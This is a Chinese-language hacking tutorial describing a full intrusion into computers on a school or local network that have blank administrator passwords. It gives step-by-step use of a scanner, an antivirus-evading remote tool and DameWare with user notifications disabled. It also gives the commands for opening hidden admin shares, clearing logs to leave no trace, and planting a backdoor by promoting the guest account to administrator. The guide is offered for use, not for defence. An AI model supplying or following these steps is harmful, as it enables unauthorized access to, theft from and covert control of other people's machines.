一次局域網(wǎng)入侵全過(guò)程-

1.入侵的范圍只包括局域網(wǎng)， 如果在學(xué)校上， 可以入侵整個(gè)校園網(wǎng);

　　2.能入侵的只是存在弱口令(用戶名為administrator等,密碼為空)， 并且開(kāi)了139端口， 但沒(méi)開(kāi)防火墻的機(jī)子。

　　入侵工具：

　　一般要用到三個(gè)：NTscan變態(tài)掃描器， Recton--D賀免殺專(zhuān)用版， DameWare迷你中文版 4.5. (前兩個(gè)工具殺毒軟件都會(huì)報(bào)毒， 建議將殺毒軟件實(shí)時(shí)防毒暫時(shí)關(guān)掉， 并將這兩個(gè)軟件的壓縮包加密， 防止被殺。 )

　　入侵步驟：

　　1.使用"NTscan變態(tài)掃描器"， 在IP處填上要掃描的IP范圍， 選擇"WMI掃描"方式， 按"開(kāi)始"后就等掃描結(jié)果了。

　　2.使用"Recton--D賀免殺專(zhuān)用版"

　　選擇"CMD命令"項(xiàng)， 在"CMD:"中輸入"net share C$=C:\"， 即可開(kāi)啟遠(yuǎn)程主機(jī)的C盤(pán)共享， 以此將"C"換成D,E,F等， 即可開(kāi)啟D盤(pán)， E盤(pán)， F盤(pán)等的共享， 這種共享方式隱蔽性很高， 而且是完全共享， 在對(duì)方主機(jī)上不會(huì)出現(xiàn)一只手托住盤(pán)的共享標(biāo)志， 然后在地址欄中輸入"\\對(duì)方IP\C$"， 即可進(jìn)入對(duì)方C盤(pán)。

　　選擇"Telnet"項(xiàng)， 在"遠(yuǎn)程主機(jī)"中輸入剛才掃描到的一個(gè)IP， 遠(yuǎn)程啟動(dòng)Telnet服務(wù)， 成功后在"CMD選項(xiàng)"中， 執(zhí)行命令："net share ipc$",接著執(zhí)行："net share admin$",最后執(zhí)行"net use \\***.***.***.***\IPC$" /user：administrator"在*處填入你入侵的主機(jī)IP。

　　3.使用"DameWare迷你中文版 4.5"， 安裝后點(diǎn)"DameWare Mini Remote Control"， 在"幫助"項(xiàng)中選擇激活產(chǎn)品， 輸入注冊(cè)信息， 成功注冊(cè)后， 進(jìn)入"遠(yuǎn)程連接"窗口， 在"主機(jī)"處填入IP地址， 點(diǎn)"設(shè)置"， 在"服務(wù)安裝選項(xiàng)"中點(diǎn)"編輯"后,在"通知對(duì)話框"中去掉"連接時(shí)通知",在"附加設(shè)置"中全都不選， 在"用戶選項(xiàng)"中去掉"啟用用戶選項(xiàng)菜單"。 設(shè)置完成好后， 就可點(diǎn)"連接"， 在彈出的對(duì)話框中點(diǎn)"確定"后， 成功后你就可以像操作自己機(jī)子一樣控制別人電腦了， 當(dāng)然你也可以只選擇監(jiān)視對(duì)方屏幕。 注意：如果不注冊(cè)的話， 在對(duì)方主機(jī)上會(huì)彈出一個(gè)對(duì)話框， 暴露你的身份。

　　入侵步驟補(bǔ)充：

　　1.在以上第2步中， 遠(yuǎn)程啟動(dòng)Telnet服務(wù)可以通過(guò)"我的電腦-管理-連接到另一臺(tái)計(jì)算機(jī)-輸入IP-服務(wù)和應(yīng)用程序-服務(wù)-將telnet改為手動(dòng)-啟動(dòng)"完成。

　　2.Recton-D賀免殺專(zhuān)用版還有其他功能， 在"進(jìn)程"項(xiàng)中， 可以查看遠(yuǎn)程主機(jī)的進(jìn)程， 并可任意結(jié)束其中進(jìn)程;在"共享"項(xiàng)中， 可以創(chuàng)建共享， 我常用的是創(chuàng)建C$,D$,E$,F$,共享路徑分別對(duì)應(yīng)C：\,D：\等， 共享好后在地址欄中輸入\\IP\C$,進(jìn)入對(duì)方C盤(pán)， 你就可以隨意復(fù)制刪除里面的東西了， 而且這種共享對(duì)方機(jī)子盤(pán)符上不會(huì)顯示共享圖標(biāo)， 也就不會(huì)被發(fā)現(xiàn)， 弄完后最好還是把共享給關(guān)掉。 最后選"日志"， 清除所有日志， 不留痕跡。 這個(gè)軟件會(huì)被殺毒軟件當(dāng)作病毒殺掉， 用它時(shí)須將實(shí)時(shí)防毒關(guān)掉。

　　3.上面的共享可通過(guò)CMD(程序-附件-命令提示符)完成， 首先"telnet IP",telnet上去,鍵入y后輸入的用戶名"administrator",密碼為空, 進(jìn)入后， 開(kāi)共享用net share命令， 共享C$(即C盤(pán))："net share C$=C：",共享system文件夾："net share c=c：\winnt\system32",共享IPC$用："net share IPC$"等,最后是關(guān)閉共享， 關(guān)閉C盤(pán)共享："net share C$Content$nbsp;/del"。

　　4.為方便下次入侵， 可以設(shè)置后門(mén)， 查看用戶："net user",激活guest用戶

　　"net user guest /active：yes",更改guest的密碼為poco："net user guest poco",把guest的權(quán)限提升為管理員權(quán)限："net localgroup administrators guest /add"。

　　5.telnet命令(DOS命令)很多， 可去網(wǎng)上查找它的命令， 常用的有：查看D盤(pán)文件：""dir d：\",查看C盤(pán)program file文件夾："dir c：\PROGRA~1\;",60秒倒記時(shí)關(guān)機(jī)："shutdown -s -t 60"

　　補(bǔ)充說(shuō)明：

　　1.net use錯(cuò)誤原因解決：

　　(1)."發(fā)生系統(tǒng)錯(cuò)誤 1326。 登錄失敗： 未知的用戶名或錯(cuò)誤密碼。 "

　　在遠(yuǎn)程機(jī)的"控制面板-文件夾選項(xiàng)-查看-簡(jiǎn)單的文件共享",去掉選取,然后再?lài)L試連接。 簡(jiǎn)單文件共享會(huì)把網(wǎng)絡(luò)連接權(quán)限都?xì)w為 guest連接， 是無(wú)法訪問(wèn)C$等管理共享的.

　　(2)"發(fā)生系統(tǒng)錯(cuò)誤 1327。 登陸失�。河脩魩�戶限制。 可能的原因包括不允許空密碼， 登陸時(shí)間限制， 或強(qiáng)制的策略限。 "在遠(yuǎn)程機(jī)的"控制面板-管理工具-本地安全策略-安全選項(xiàng)-用戶權(quán)限"指派里， 禁用"空密碼用戶只能進(jìn)行控制臺(tái)登陸".

　　(3)"//IP/c$"時(shí)提示找不到網(wǎng)絡(luò)途徑。 在"網(wǎng)絡(luò)和撥號(hào)連接"中"本地連接"中選取"Internet協(xié)議(TCP/IP)"屬性， 進(jìn)入"高級(jí)TCP/IP設(shè)置"選"WINS設(shè)置"里面有一項(xiàng)"啟用TCP/IP的NETBIOS".